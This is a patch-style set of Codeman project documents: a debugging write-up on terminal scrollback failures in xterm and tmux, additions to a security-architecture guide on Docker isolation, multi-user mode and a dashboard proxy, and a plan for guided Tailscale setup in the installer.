scrollback to reach**. `terminal.scrollLines()` is a no-op, which is why touch scrolling
|
||||
on Android "does nothing".
|
||||
2. xterm's own wheel listener takes over. From the vendored bundle
|
||||
(`src/web/public/vendor/xterm.min.js`):
|
||||
|
||||
```js
|
||||
if (!this.buffer.hasScrollback) {
|
||||
if (ev.deltaY === 0) return false;
|
||||
if (coreMouseService.consumeWheelEvent(...) === 0) return this.cancel(ev, true);
|
||||
const seq = ESC + (decPrivateModes.applicationCursorKeys ? 'O' : '[') + (ev.deltaY < 0 ? 'A' : 'B');
|
||||
coreService.triggerDataEvent(seq, true);
|
||||
return this.cancel(ev, true);
|
||||
}
|
||||
```
|
||||
|
||||
tmux also set `\x1b[?1h`, so the emitted sequence is `\x1bOA`, i.e. **Up arrow**, straight
|
||||
into the shell's readline. That is exactly the reported "the mouse wheel scrolls back
|
||||
through previous commands, like pressing up".
|
||||
|
||||
3. `cancel(ev, true)` calls `preventDefault()` **and `stopPropagation()`**, and xterm's
|
||||
listener sits on `terminal.element` (a child of Codeman's container). So Codeman's own
|
||||
container wheel handler, `_shouldForwardWheelToApp` and `_wheelScrollLines` included, is
|
||||
**never reached** for these modes. That whole path is dead code for shell.
|
||||
|
||||
### Reproduction (live instance, real browser)
|
||||
|
||||
Create a shell session with the page already open, print 150 lines, then dispatch 8 wheel-up
|
||||
events over `.xterm-screen`:
|
||||
|
||||
```
|
||||
t+1500 after shell start {"type":"alternate","length":35,"baseY":0}
|
||||
t+3000 after shell start {"type":"alternate","length":35,"baseY":0}
|
||||
after 150 live lines {"type":"alternate","length":35,"baseY":0}
|
||||
WHEEL on live shell: {"ptyBytes":["OA","OA","OA","OA",
|
||||
"OA","OA","OA","OA"],
|
||||
"before":0,"after":0,"type":"alternate"}
|
||||
```
|
||||
|
||||
Both reported symptoms, one root cause.
|
||||
|
||||
### Why it looks intermittent
|
||||
|
||||
The alternate-screen sequence only ever reaches the browser through the **live stream at
|
||||
attach**. Neither replay path carries it:
|
||||
|
||||
- `?full=1` returns `capture-pane` output (`source: mux-full-history`), verified 0 hits for
|
||||
`\x1b[?1049h`.
|
||||
- `?tail=` returns the visible pane frame (`source: mux-visible`), also 0 hits; the shell byte
|
||||
buffer was empty in every probe.
|
||||
- `_resetTerminalForReplay()` calls `terminal.reset()`, which returns xterm to the normal
|
||||
buffer.
|
||||
|
||||
So: watching a shell from creation leaves you in the alternate buffer until you reload or
|
||||
switch tabs, at which point it silently starts working again. Then the next PTY attach (a
|
||||
restart, or the auto-reattach in `selectSession()`) puts you back.
|
||||
|
||||
### Is stripping safe for shell? Probably yes when tmux-backed, and the current code comment is wrong about why
|
||||
|
||||
`src/session.ts:1404` says *"shell must keep the alt screen for vim/less/htop"*. For a
|
||||
**tmux-backed** shell that reasoning does not hold: tmux is a full terminal emulator and never
|
||||
forwards a pane's alternate-screen toggles to its client, it repaints instead. Measured per
|
||||
phase on a real attach:
|
||||
|
||||
| phase | bytes | `?1049h` | `?1049l` | `?47/1047` |
|
||||
| ----- | ----: | -------: | -------: | ---------: |
|
||||
| attach | 772 | **1** | 0 | 0 |
|
||||
| `seq 1 60` echo | 1402 | 0 | 0 | 0 |
|
||||
| `less` open / end / quit | 284 / 230 / 321 | 0 | 0 | 0 |
|
||||
| `vim` open / quit | 2200 / 646 | 0 | 0 | 0 |
|
||||
|
||||
`vim` and `less` inside tmux emit **zero** alternate-screen sequences to the client.
|
||||
|
||||
The caveat that does matter: `startShell()` falls back to a **direct PTY with no tmux** when
|
||||
mux creation fails (`src/session.ts:1961`, `this._useMux = false`). In that path the inner
|
||||
app's own `?1049h` does reach xterm, and a blanket strip would break vim/less/htop for real.
|
||||
Any fix has to be conditional on `_useMux`, which is known server-side.
|
||||
|
||||
Second caveat: stripping alone buys less than it looks like, because of finding 2. It fixes
|
||||
the wheel (no more phantom Up arrows) and it makes the `full=1` replay reachable, but live
|
||||
output still will not accumulate.
|
||||
|
||||
---
|
||||
|
||||
## Finding 2: bursty output silently overwrites a screenful of browser scrollback
|
||||
|
||||
Independent of the alternate buffer, and it hits Claude sessions too.
|
||||
|
||||
tmux decides per flush whether to emit real linefeeds (which push rows into the outer
|
||||
terminal's scrollback) or to repaint the pane rectangle with cursor addressing (which
|
||||
overwrites the visible rows in place). When output outpaces its flush interval it coalesces
|
||||
into a repaint, and one screenful of the browser's history is **destroyed**.
|
||||
|
||||
Measured on one session, same page, `rows = 36`:
|
||||
|
||||
| step | `baseY` | rows containing SEED | BURST | SLOW |
|
||||
| ---- | ------: | -------------------: | ----: | ---: |
|
||||
| after `?full=1` replay (120 seeded lines) | 86 | 120 | 0 | 0 |
|
||||
| after 60 lines emitted as fast as possible | **87** (+1) | **86** (-34) | 35 | 0 |
|
||||
| after 60 lines at ~16/s (`sleep 0.06`) | **148** (+61) | 86 | 35 | 60 |
|
||||
|
||||
The burst added **one** row of scrollback and ate **34** rows of existing history. The slow
|
||||
run behaved correctly. So "I printed a bunch of lines and now I cannot scroll back" reproduces
|
||||
without the alternate buffer being involved at all, and it is rate dependent, which is exactly
|
||||
the kind of thing that reads as random flakiness.
|
||||
|
||||
Consequence: the browser's scrollback is effectively frozen at whatever the last `?full=1`
|
||||
replay produced, minus a screen per burst. tmux's own history is fine throughout
|
||||
(`history_size` kept growing, `history-limit` 2000), so the data is never actually lost
|
||||
server-side, it just never reaches the browser again until a reload.
|
||||
|
||||
---
|
||||
|
||||
## Finding 3: switching tabs collapses a session's scrollback
|
||||
|
||||
`_initialFullBufferLoad` is true for the **first buffer load after a page load only**
|
||||
(`app.js:4374`). Everything after that uses `?tail=`, which returns byte history plus the
|
||||
visible pane frame. Worse, the snapshot restore path deliberately throws away the restored
|
||||
xterm snapshot (which does carry scrollback) and replaces it with that frame
|
||||
(`app.js:4316-4328` plus `needsRewrite`).
|
||||
|
||||
Measured, switching away from session A and back:
|
||||
|
||||
```
|
||||
A: initial full=1 load {"len":152,"baseY":116,"AAA":150}
|
||||
A: after switch away and back {"len": 87,"baseY": 51,"AAA": 59}
|
||||
```
|
||||
|
||||
150 lines of history down to 59. Note also that the page's single `full=1` is consumed by
|
||||
whichever session auto-selects at load, so **every other tab starts life with one frame of
|
||||
history**.
|
||||
|
||||
---
|
||||
|
||||
## Finding 4: `deltaMode` is never read (Firefox)
|
||||
|
||||
`grep -rn "deltaMode" src/web/public packages` returns nothing. `_wheelScrollLines()`
|
||||
(`terminal-ui.js:2818`) treats `deltaY` as pixels unconditionally:
|
||||
|
||||
```js
|
||||
return Math.round(delta / 25) || (delta > 0 ? 1 : -1);
|
||||
```
|
||||
|
||||
Chrome/WebKit report `deltaMode: 0` with `deltaY` around 100 to 120 px per notch, so about 4
|
||||
to 5 lines. Firefox reports `deltaMode: 1` (`DOM_DELTA_LINE`) with `deltaY` around 3, so
|
||||
`Math.round(3/25) === 0` and the `|| ±1` fallback yields **1 line per notch**, roughly 4x
|
||||
slower. In Claude mode the same value caps the forwarded SGR report at 1 tick per event
|
||||
instead of 4, so the transcript crawls too.
|
||||
|
||||
This is sluggishness, not breakage, so it is a plausible but unproven contributor to the
|
||||
mtiller report. No Firefox build is installed under `~/.cache/ms-playwright` (chromium and
|
||||
webkit only), so this was not measured. Worth asking the reporter for `deltaMode` / `deltaY`
|
||||
from a live wheel event before acting on it.
|
||||
|
||||
---
|
||||
|
||||
## Finding 5: remote SSH Claude cases still have no version probe
|
||||
|
||||
`src/session.ts:1490` deliberately skips the deterministic `claude --version` probe for
|
||||
remote sessions and defers to the startup-banner scrape, which the same comment block
|
||||
describes as unreliable ("newer Claude Code builds don't print the banner and resumed sessions
|
||||
never show it"). That is precisely the condition #154 was filed for: `cliVersion` empty means
|
||||
`_shouldForwardWheelToApp()` returns false, wheel forwarding is off, and the user is left with
|
||||
local scrollback that (per finding 2) does not accumulate.
|
||||
|
||||
Local and Docker Claude sessions are fine; verified all 7 live sessions report
|
||||
`cliVersion=2.1.223`, so the 1.3.3 fix is still working there.
|
||||
|
||||
---
|
||||
|
||||
## Candidate directions (not decided)
|
||||
|
||||
Roughly in order of value per unit of risk.
|
||||
|
||||
1. **Extend the alternate-screen strip to tmux-backed `shell` / `opencode` / `antigravity`.**
|
||||
Gate on `_useMux` so the direct-PTY fallback keeps vim/less/htop working. Kills the phantom
|
||||
Up arrows and makes replayed history reachable. `isAltScreenStripMode()` currently takes
|
||||
only `mode`, so it would need the mux flag threaded in, and
|
||||
`test/claude-scrollback-strip.test.ts:16-17` plus `test/antigravity-mode.test.ts:116` pin
|
||||
the current answers and would need updating.
|
||||
|
||||
2. **Re-pull `?full=1` when the user scrolls to the top of the buffer.** Directly addresses
|
||||
findings 2 and 3 with machinery that already exists and is already proven to return
|
||||
complete history (200/200 lines in the probe). Needs a guard against refetch storms.
|
||||
|
||||
3. **Stop discarding the xterm snapshot on tab switch**, or request `full=1` on the first load
|
||||
per session rather than per page. Cheaper partial fix for finding 3 alone.
|
||||
|
||||
4. **Read `ev.deltaMode`** in `_wheelScrollLines()` and normalise line/page deltas to lines.
|
||||
Small, self-contained, worth doing regardless of whether it is mtiller's actual bug.
|
||||
|
||||
5. **Probe the CLI version over SSH for remote Claude cases**, mirroring the deferred
|
||||
in-container probe that Docker cases already use.
|
||||
|
||||
Option 1 alone does not fix #205's "print a bunch of lines then scroll" complaint; that needs
|
||||
2 as well.
|
||||
|
||||
## Reproduction assets
|
||||
|
||||
Scripts used, in the session scratchpad
|
||||
(`/tmp/claude-1000/-home-arkon-default-claudeman/597ffc9f-.../scratchpad/`):
|
||||
|
||||
- `ptycap.py` / `ptycap2.py`: PTY-level capture of the tmux client stream, per phase counts of
|
||||
alternate-screen and mouse-tracking sequences.
|
||||
- `sim.mjs`: replays a captured stream through `@xterm/headless` with and without the strip.
|
||||
- `browser-test*.mjs`: Playwright against the live instance, reports `buffer.active.type`,
|
||||
`baseY`, row content and the exact bytes xterm sends to the PTY on a wheel event.
|
||||
|
||||
`@xterm/headless` was installed with `npm i --no-save`, so `package.json` and the lockfile are
|
||||
untouched.
|
||||
@@ -30,7 +30,8 @@ an explicit, guided opt‑in.
|
||||
7. [Supply‑chain & build‑asset hardening](#7-supplychain--buildasset-hardening-cod28)
|
||||
8. [Multi‑instance isolation](#8-multiinstance-isolation)
|
||||
9. [Transport security headers](#9-transport-security-headers)
|
||||
10. [Quick reference](#10-quick-reference)
|
||||
10. [Docker container isolation](#10-docker-container-isolation)
|
||||
11. [Quick reference](#11-quick-reference)
|
||||
|
||||
---
|
||||
|
||||
@@ -248,16 +249,28 @@ Ordered most‑to‑least recommended:
|
||||
|
||||
### A. Tailscale serve (recommended)
|
||||
|
||||
Bind loopback, let Tailscale front it on your tailnet with a real cert:
|
||||
Bind loopback, let Tailscale front it on your tailnet with a real cert. **The
|
||||
installer sets this up for you**: choose **Tailscale** at the network-access
|
||||
prompt, or retrofit an existing install with:
|
||||
|
||||
```bash
|
||||
codeman web --https # binds 127.0.0.1:3000
|
||||
tailscale serve --bg https / http://127.0.0.1:3000
|
||||
bash ~/.codeman/app/install.sh tailscale
|
||||
```
|
||||
|
||||
Only devices on your tailnet can reach it; Tailscale handles identity. No app
|
||||
password and no `0.0.0.0` bind required. (This is the maintainer's production
|
||||
setup.)
|
||||
The guided flow installs Tailscale if needed, walks through login and the
|
||||
tailnet HTTPS-certificates toggle, and configures the equivalent of:
|
||||
|
||||
```bash
|
||||
codeman web # binds 127.0.0.1:3000 (plain HTTP is fine here)
|
||||
tailscale serve --bg 3000 # HTTPS at https://<node>.<tailnet>.ts.net
|
||||
```
|
||||
|
||||
Only devices on your tailnet can reach it; Tailscale handles identity and
|
||||
terminates TLS with a real Let's Encrypt certificate (so PWA install and web
|
||||
push work). No app password and no `0.0.0.0` bind required. (This is the
|
||||
maintainer's production setup.) `CODEMAN_TAILSCALE=1` presets the choice for
|
||||
automation; the installer never runs `tailscale serve reset` and never touches
|
||||
serve mappings other than `443 -> Codeman's port`.
|
||||
|
||||
### B. Authenticated cloudflared tunnel + password
|
||||
|
||||
@@ -471,7 +484,45 @@ production layout (`~/.codeman`, `-L codeman`, port 3000).
|
||||
|
||||
---
|
||||
|
||||
## 10. Quick reference
|
||||
## 10. Docker container isolation
|
||||
|
||||
Docker cases (1.4.0) run a session inside a per‑case container instead of on the host. The security posture:
|
||||
|
||||
- **Hardened create flags, always** — `--cap-drop ALL`, `--security-opt no-new-privileges`, `--pids-limit` (fork‑bomb guard), `--memory` == `--memory-swap` (a real OOM cap), `--init`, and non‑root: `--user <hostUid>:0` on Linux (host uid → workspace files stay host‑owned; GID 0 keeps `$HOME` writable), `--userns=keep-id` on rootless Podman. **Never** `--privileged`, and **never** the docker socket — the pure builder in `docker-hosts.ts` cannot emit them and the schema cannot represent them.
|
||||
- **Credentials never enter an image** — the convenient default bind‑mounts host cred dirs (`~/.claude`, `~/.codex`, `~/.gemini` — which also carries Antigravity's `antigravity-cli/` state — and `~/.config/{gcloud,opencode}`) read‑write. Bind mounts are physically excluded from `docker commit`, so exported images are secret‑free. API‑key CLIs get their key as an exec‑time NAME‑ONLY `--env OPENAI_API_KEY` (no `=value`, no `ps` leak, never committed); a create‑time `-e` for a secret is never used. The **sealed** profile (`mountCredentials:false` + `network:none`) drops the host mounts; full‑image export is then refused (an in‑container login would ride the committed layer) unless a pre‑commit scrub is opted into.
|
||||
- **Blast radius — accept it explicitly** — the convenient profile mounts an arbitrary host workspace RW plus the host credential dirs RW into a network‑enabled container, so container‑run agent code can read/modify those host trees and reach the network at once. Still a net improvement over today's on‑host `--dangerously-skip-permissions` execution; use the sealed profile for genuinely untrusted work.
|
||||
- **Import is untrusted‑bundle‑safe** — `/api/docker-cases/import` validates the manifest + per‑member SHA‑256 before extraction, rejects absolute / `..` tar members (traversal guard), and re‑tags the loaded image into a quarantined namespace so it can never overwrite `codeman/agent:base` or a pre‑existing tag.
|
||||
- **Host guard & the bridge‑hooks listener** — in‑container hook callbacks carry `Host: host.docker.internal` / `host.containers.internal`; both are on the always‑on host‑header allowlist (`DOCKER_HOST_GATEWAY_ALIASES`) and resolve to the host only from inside a container netns, so they are not a browser DNS‑rebinding surface. On a loopback‑only server, in‑container hooks are opt‑in via `CODEMAN_DOCKER_BRIDGE_HOOKS=1`, which binds a SECOND listener on the docker bridge gateway serving **only** the hook endpoints (every other path → `403`) into the same hook‑secret‑gated pipeline. The bridge is host‑internal (containers + host), not the LAN, so it does not widen network exposure; the hook secret is bind‑mounted read‑only and referenced by path.
|
||||
- **Instance isolation** — every managed container is labeled `codeman.instance=<CODEMAN_INSTANCE>`; the boot reaper reaps orphans of its OWN instance only, so a beta never removes a prod container. The in‑container tmux socket (`-L codeman-docker`) + session name (`codeman-dkr-*`) deliberately fail a nested Codeman's discovery pattern.
|
||||
|
||||
Full feature guide: [`docker-cases.md`](docker-cases.md).
|
||||
|
||||
---
|
||||
|
||||
## 10a. Multi‑user mode (opt‑in)
|
||||
|
||||
`codeman web --multiuser` (or `CODEMAN_MULTIUSER=1`) turns on named users with individually scrypt‑hashed passwords in `~/.codeman/users.json` (mode 0600). OFF by default; when off, nothing here applies and behavior is byte‑identical to single‑user. Design + phase status: [`multi-user-plan.md`](multi-user-plan.md).
|
||||
|
||||
- **It is workspace separation, NOT a security boundary between users.** Every session still runs as the SAME OS account with agent code that can read the whole host. Any user can ask their agent to `cat` another user's files; the WEB layer enforces scoping, the AGENT layer cannot. Mitigations: give non‑admins the default `auto` permission mode (classifier‑guarded), pair users with **Docker cases** (container per case) for real isolation, or run separate Codeman instances under separate OS accounts. Stated loudly in the admin panel and the plan's threat model (section 2).
|
||||
- **It strictly improves network posture.** It removes the single shared `CODEMAN_PASSWORD` and gives each person a revocable credential; a non‑loopback bind and the tunnel‑enable guard are satisfied by "multi‑user with ≥1 enabled user" without a shared password.
|
||||
- **Auth is a parallel branch** (`middleware/auth.ts`) that leaves the single‑user path untouched: per‑user scrypt verify (`timingSafeEqual`, timing‑equalized against user enumeration), identity‑carrying cookies, a per‑username failure bucket (a botnet can't brute one account across IPs; one NATed user can't lock out the rest), and a `mustChangePassword` lockbox. The hook‑secret loopback bypass, host guard, and Origin/CSRF guard are unchanged (hooks authenticate the INSTANCE, not a user).
|
||||
- **Ownership is enforced server‑side only** and fails closed: `req.authUser` (a synthetic admin in single‑user), `findSessionOrFail` returns NOT_FOUND (never 403) for a foreign session, list/SSE/WS/file‑preview/search all filter by `session.owner`, and SSE routing defaults session‑scoped events to their owner (unresolved owner → withheld). The load‑bearing rule is **non‑admin `workingDir` confinement**: a non‑admin's session/one‑shot working dir must realpath‑resolve inside `~/codeman-users/<name>/cases`, checked BEFORE any disk write.
|
||||
- **Privileged actions are a one‑bit grant** (`canBypassPermissions`, default off): only granted users (and admins) get `--dangerously-skip-permissions` (others are silently downgraded to `--permission-mode auto`), shell‑mode sessions, cron `launchCommand`, and other CLIs' bypass flags. Machine‑level resources (remote/Docker host definitions, tunnel, self‑update, settings writes) are admin‑only.
|
||||
- **Admin actions are audited** append‑only to `~/.codeman/admin-audit.jsonl` (acting admin, action, target, IP). Passwords set by an admin create/reset are one‑time (returned once, force change). Under Basic auth, `logout` only truly ends QR‑issued sessions — to lock someone out, disable the account or reset the password (a proper login form is a deferred Phase 6).
|
||||
|
||||
---
|
||||
|
||||
## 10b. Web tabs (dashboard proxy)
|
||||
|
||||
A saved dashboard URL renders as a tab, served through Codeman's own origin at `/webview/<capability>/`. User guide: [`web-tabs.md`](web-tabs.md). Three properties carry the security weight:
|
||||
|
||||
- **The proxy is exempt from cookie auth and the Origin/CSRF guard, and that is deliberate.** The iframe is sandboxed without `allow-same-origin`, so it is opaque‑origin: its requests are cross‑site, meaning the `SameSite=lax` session cookie is never attached and its writes and WS upgrades arrive with `Origin: null`. The credential is instead a 192‑bit capability in the path, minted only by an authenticated `POST /api/webviews/:id/open`, held in memory (a restart invalidates every one), rolling TTL, bound to the minting user, and granting nothing but "relay bytes to this one saved URL". ⚠️ **The Host allowlist is NOT bypassed**, so DNS‑rebinding protection is unaffected. A second `Referer`‑keyed form exists for root‑absolute assets and is the only exemption decided by a request‑supplied header, so it is fenced to safe methods on non‑`/api`, non‑`/ws`, non‑`/q` paths. Edges pinned by `test/webview-auth-exemption.test.ts`.
|
||||
- **Sandboxed by default; `allow-same-origin` is an explicit per‑dashboard opt‑in.** A proxied page is same‑origin with Codeman, so without the sandbox its JavaScript could read the Codeman document and call the agent‑spawning API. ⚠️ In BOTH modes the `Authorization` header and the `codeman_session` cookie are stripped before the upstream request, because a trusted (same‑origin) frame makes the browser attach Codeman's own Basic‑auth credentials to every proxied request; forwarding them would hand `CODEMAN_PASSWORD` to the dashboard.
|
||||
- **Not an open relay, and not a privilege boundary.** `resolveUpstreamUrl()` refuses anything leaving the saved origin, and cross‑origin redirects are handed back unchanged rather than followed. The proxy does reach whatever the SERVER can reach, which is not an escalation for someone who already commands `--dangerously-skip-permissions` agents, but in multi‑user mode it means a non‑admin's dashboard is fetched from the server's network position. Saved URLs are validated to plain http(s) with no embedded credentials, and there is deliberately **no magic‑link path**: terminal output can never create a webview (the mistake the attachment scanner had to be walled off from).
|
||||
|
||||
---
|
||||
|
||||
## 11. Quick reference
|
||||
|
||||
| Env / flag | Effect |
|
||||
|------------|--------|
|
||||
@@ -482,6 +533,8 @@ production layout (`~/.codeman`, `-L codeman`, port 3000).
|
||||
| `--https` | Enable TLS (adds HSTS) |
|
||||
| `CODEMAN_INSTANCE` | Scope tmux socket + data dir for isolation |
|
||||
| `CODEMAN_GESTURE=1` | Make the gesture overlay available (widens CSP) |
|
||||
| `CODEMAN_DOCKER_BRIDGE_HOOKS=1` | Serve the hook endpoints on the docker bridge gateway (host‑internal, hooks‑only, `403` elsewhere) so in‑container hooks reach a loopback‑bound server — see §10 |
|
||||
| `CODEMAN_DOCKER_BRIDGE_HOST` | Override the bridge gateway IP the hooks listener binds (default: auto‑detect) |
|
||||
|
||||
**Audit log:** session lifecycle and server start are recorded in
|
||||
`~/.codeman/session-lifecycle.jsonl`.
|
||||
|
||||
@@ -0,0 +1,236 @@
|
||||
# Tailscale Setup in the Installer (Plan)
|
||||
|
||||
Goal: make "Codeman over Tailscale, with real HTTPS" a first-class, guided path in
|
||||
`install.sh`, instead of a one-line hint pointing at the docs. Today the safest
|
||||
recommended deployment (loopback bind + `tailscale serve`) is exactly what the
|
||||
maintainer's own prod runs, but a new user has to discover and wire it by hand.
|
||||
The installer should do it for them.
|
||||
|
||||
Status: IMPLEMENTED (2026-08-04). `install.sh` carries the 3-way network
|
||||
prompt, the guided Tailscale flow, and the `tailscale` subcommand; README,
|
||||
`docs/security-architecture.md` section A, and CLAUDE.md are updated. Verified
|
||||
live on the maintainer's prod host: `install.sh tailscale` took the idempotent
|
||||
kept-as-is path against the existing serve mapping (recognizing the legacy
|
||||
`https+insecure://` target), verified `https://<node>.ts.net/api/status`
|
||||
end-to-end, and left `tailscale serve status` byte-identical. Items 1-4, 7,
|
||||
and 10-12 of the manual matrix below still need a fresh machine to exercise.
|
||||
|
||||
## Why this is low-hanging fruit
|
||||
|
||||
Everything on the app side already works; this is almost purely installer UX:
|
||||
|
||||
- `.ts.net` is already in `DEFAULT_TRUSTED_HOST_SUFFIXES`
|
||||
(`src/web/network-auth-policy.ts`), so the always-on Host/Origin guard accepts
|
||||
`tailscale serve` traffic with zero configuration. No `CODEMAN_ALLOWED_HOSTS`
|
||||
needed.
|
||||
- The loopback bind is the server default and prints no warning; nothing to
|
||||
acknowledge, no `CODEMAN_PASSWORD` strictly required (the tailnet is the auth
|
||||
boundary; Tailscale authenticates the device before a packet ever reaches us).
|
||||
- `tailscale serve` terminates TLS with a real Let's Encrypt certificate for
|
||||
`<node>.<tailnet>.ts.net`. That gives users valid HTTPS with no self-signed
|
||||
cert warnings, and (because it is a proper secure context) working service
|
||||
worker, PWA install, and web push on phones. This is strictly better than
|
||||
`codeman web --https` for remote access.
|
||||
- SSE and WebSockets work through serve (proven by prod:
|
||||
`https://tnode.tailf80371.ts.net` fronting `127.0.0.1:3000` daily).
|
||||
- `docs/security-architecture.md` section "A. Tailscale serve (recommended)"
|
||||
already documents this as the preferred setup; the installer just does not
|
||||
implement it.
|
||||
|
||||
## UX design
|
||||
|
||||
### 1. The network-access prompt grows a Tailscale option
|
||||
|
||||
`choose_network_binding()` (install.sh:1051) currently offers two choices. New
|
||||
menu, with Tailscale first when it can be recommended:
|
||||
|
||||
```
|
||||
Network access
|
||||
|
||||
How should the Codeman dashboard be reachable?
|
||||
|
||||
1) Tailscale (recommended)
|
||||
Private VPN access from your phone/laptop, real HTTPS,
|
||||
no password needed. Works from anywhere, not just your Wi-Fi.
|
||||
2) Any device on your network (0.0.0.0)
|
||||
Open it straight from your phone or laptop on the same Wi-Fi.
|
||||
Less safe: set a password so only you control your agents.
|
||||
3) This machine only (127.0.0.1)
|
||||
Safest. Reach it remotely via Tailscale or a tunnel later.
|
||||
```
|
||||
|
||||
Choice mapping:
|
||||
|
||||
- Option 1 = bind `127.0.0.1` (unchanged server posture) + configure
|
||||
`tailscale serve`. Internally it is option 3 plus the serve setup, so all
|
||||
existing binding plumbing (`BIND_HOST`, service files, `read_existing_binding`)
|
||||
is untouched.
|
||||
- Options 2 and 3 behave exactly as today (renumbered).
|
||||
- Default choice: 1 when tailscale is installed and logged in, or when an
|
||||
existing serve mapping for our port is detected; otherwise keep today's
|
||||
defaults (1 -> 2, 2 -> 3 renumbering, preserving the "existing setup wins"
|
||||
rule). If tailscale is not installed, option 1 is still shown (the installer
|
||||
offers to install it), but the default stays on the current behavior so a
|
||||
bare Enter never pulls in new software.
|
||||
- Password: after choosing Tailscale, offer the password prompt as optional
|
||||
defense in depth with default skip ("the tailnet already authenticates your
|
||||
devices; add one anyway?"). No `BIND_ACK` needed since the bind is loopback.
|
||||
|
||||
### 2. The Tailscale flow (state machine)
|
||||
|
||||
New `setup_tailscale_access()` runs after the binding choice, before service
|
||||
setup, handling each state in order:
|
||||
|
||||
1. **Not installed.**
|
||||
- Linux: offer to run the official installer
|
||||
(`curl -fsSL https://tailscale.com/install.sh | sh`), which handles all
|
||||
distros and enables `tailscaled` at boot. This mirrors our own
|
||||
curl-pipe-bash story and avoids maintaining per-distro logic like the six
|
||||
`install_cloudflared_*` functions.
|
||||
- macOS: do not auto-install (the GUI app needs an interactive login).
|
||||
Offer `brew install --cask tailscale` when brew exists, else print the
|
||||
download link, then wait-and-retry or let the user skip.
|
||||
- Declined install => fall back to plain loopback (option 3 behavior) and
|
||||
print how to redo this later (`install.sh tailscale`, see below).
|
||||
2. **Installed but logged out** (`tailscale status --json` ->
|
||||
`.BackendState == "NeedsLogin"` or `"Stopped"`).
|
||||
- Run `tailscale up` (via `run_as_root` if needed). It prints an auth URL
|
||||
that works headless (user opens it on any device). Poll
|
||||
`.BackendState == "Running"` with a friendly spinner + timeout; on
|
||||
timeout, skip gracefully with re-run instructions.
|
||||
3. **Running: grant operator (Linux).** `sudo tailscale set --operator=$USER`
|
||||
so serve configuration (now and in the future) does not need root. Skip
|
||||
silently if we are already operator (probe: `tailscale serve status`
|
||||
exits 0) or sudo is declined; fall back to `run_as_root tailscale serve ...`.
|
||||
4. **HTTPS availability check.** `.CertDomains` empty or
|
||||
`.CurrentTailnet.MagicDNSEnabled == false` means the tailnet has not enabled
|
||||
MagicDNS / HTTPS certificates. Print the exact two toggles with the admin
|
||||
URL (https://login.tailscale.com/admin/dns: enable MagicDNS, then enable
|
||||
HTTPS Certificates), then offer "I enabled it, re-check" / "skip for now".
|
||||
No silent HTTP fallback: the pitch is real HTTPS, and a plain-HTTP serve
|
||||
would break the PWA/push story. Skipping falls back to loopback + re-run
|
||||
instructions.
|
||||
5. **Existing serve config check** (`tailscale serve status --json`).
|
||||
- Already proxying to our port (443 -> `127.0.0.1:$PORT`): keep it, report
|
||||
it, done. Re-running the installer must be idempotent.
|
||||
- Port 443 occupied by a DIFFERENT target: never clobber it. Ask whether to
|
||||
replace it or skip. (Prod itself has a second serve on :5000; blind
|
||||
`tailscale serve reset` would destroy user config. NEVER use `reset`.)
|
||||
6. **Configure.** `tailscale serve --bg $PORT` where `$PORT` is the install's
|
||||
Codeman port (default 3000; honor a preset `CODEMAN_PORT`). Serve targets
|
||||
plain HTTP on loopback; TLS terminates at tailscaled with the real cert.
|
||||
The `--bg` config persists in tailscaled state across reboots, so no extra
|
||||
service unit is needed.
|
||||
(Note: do NOT combine this with `codeman web --https`; that is what forces
|
||||
the awkward `https+insecure://` proxy target prod historically used. New
|
||||
installs should keep Codeman on plain HTTP behind serve.)
|
||||
7. **Verify end-to-end.** Derive the URL from `.Self.DNSName` (strip the
|
||||
trailing dot) and curl `https://<dnsname>/api/status` after the service is
|
||||
up, retrying for ~30s: the first request can be slow while the Let's
|
||||
Encrypt cert is issued. Print success with the URL, or the observed error
|
||||
with `tailscale serve status` output on failure. This follows the "always
|
||||
test before claiming it works" rule; a blind "done!" is not acceptable.
|
||||
|
||||
### 3. Closing summary and security notice
|
||||
|
||||
- The final summary gains a "Remote Access (Tailscale)" block, printed above
|
||||
the cloudflared block, showing the actual URL:
|
||||
|
||||
```
|
||||
Remote Access (Tailscale):
|
||||
https://tnode.tailf80371.ts.net (any device on your tailnet, HTTPS)
|
||||
tailscale serve status # inspect
|
||||
```
|
||||
|
||||
- `print_security_notice()` third branch (loopback) gets a variant: when a
|
||||
serve mapping for our port is detected, lead with "reachable on your tailnet
|
||||
at https://... (HTTPS, tailnet-only)" instead of the generic "do ONE of"
|
||||
list. Detection is dynamic (query `tailscale serve status --json` at print
|
||||
time), no marker persisted anywhere: tailscaled's own state is the single
|
||||
source of truth, so external changes never drift against a stale flag.
|
||||
|
||||
### 4. Standalone entry point: `install.sh tailscale`
|
||||
|
||||
Add a `tailscale` subcommand next to `update` / `uninstall` in the existing
|
||||
dispatch. It runs `setup_tailscale_access()` against the already-installed
|
||||
service (reads the port from the service file, requires an existing install).
|
||||
This serves:
|
||||
|
||||
- existing installs that predate the feature,
|
||||
- users who picked "this machine only" and changed their mind,
|
||||
- every "skip for now" branch above, all of which print this exact command.
|
||||
|
||||
One implementation, two entry points. No separate `scripts/tailscale-setup.sh`
|
||||
(unlike cloudflared, there is no long-running process for a `tunnel.sh`-style
|
||||
start/stop wrapper to manage; tailscaled owns the lifecycle).
|
||||
|
||||
### 5. Non-interactive / automation
|
||||
|
||||
- `CODEMAN_TAILSCALE=1` presets choice 1 (analogous to presetting
|
||||
`CODEMAN_HOST`). In non-interactive runs it only proceeds through states
|
||||
that need no human (already installed + logged in + HTTPS-enabled tailnet);
|
||||
anything requiring interaction (login URL, admin-console toggle, replacing a
|
||||
foreign serve mapping) warns and falls back to loopback. It never installs
|
||||
tailscale non-interactively.
|
||||
- `CODEMAN_NONINTERACTIVE=1` with an existing serve mapping: preserve it, same
|
||||
"never silently loosen/change" policy as `read_existing_binding`.
|
||||
- Document both in the header comment block of install.sh (the env-var
|
||||
reference at the top) and in the README.
|
||||
|
||||
## Edge cases and decisions
|
||||
|
||||
| Case | Decision |
|
||||
| ---- | -------- |
|
||||
| macOS GUI app without `tailscale` on PATH | `get_tailscale_path()` helper mirroring `get_cloudflared_path()`: check PATH, then `/Applications/Tailscale.app/Contents/MacOS/Tailscale`. All calls go through it. |
|
||||
| Tailnet HTTPS certs disabled | Guided admin-console instructions + re-check loop; skip falls back to loopback. Never configure plain-HTTP serve. |
|
||||
| Port 443 serve exists for another app | Prompt replace/skip; never `tailscale serve reset` (destroys unrelated mappings). |
|
||||
| First cert issuance latency | Verify step retries ~30s and says why the first load may be slow. |
|
||||
| `tailscale up` needs auth | Print the auth URL prominently, poll with timeout, skip gracefully. Works headless. |
|
||||
